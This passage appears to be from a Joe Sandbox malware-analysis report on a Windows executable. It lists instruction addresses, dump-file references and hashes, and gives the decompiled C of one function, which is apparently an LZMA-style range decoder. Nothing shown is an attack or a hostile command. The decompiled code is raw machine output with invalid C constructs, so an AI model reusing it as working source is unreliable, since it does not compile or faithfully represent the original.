                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f44
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040734c
                                                  0x0040734c
                                                  0x0040734c
                                                  0x00407350
                                                  0x00000000
                                                  0x00000000
                                                  0x00407356
                                                  0x00407359
                                                  0x0040735c
                                                  0x0040735f
                                                  0x00407361
                                                  0x00407361
                                                  0x00407361
                                                  0x00407364
                                                  0x00407367
                                                  0x0040736a
                                                  0x0040736d
                                                  0x00407370
                                                  0x00407373
                                                  0x00407374
                                                  0x00407376
                                                  0x00407376
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737c
                                                  0x0040737f
                                                  0x00407382
                                                  0x00407385
                                                  0x00407389
                                                  0x0040738b
                                                  0x0040738e
                                                  0x00000000
                                                  0x00407390
                                                  0x00000000
                                                  0x00407390
                                                  0x0040738e
                                                  0x004075c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                  • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                  • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                  • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                  0x00406bc0
                                                  0x00406bc7
                                                  0x00406bcd
                                                  0x00406bd3
                                                  0x00000000
                                                  0x00406bd7
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406bec
                                                  0x00000000
                                                  0x00000000
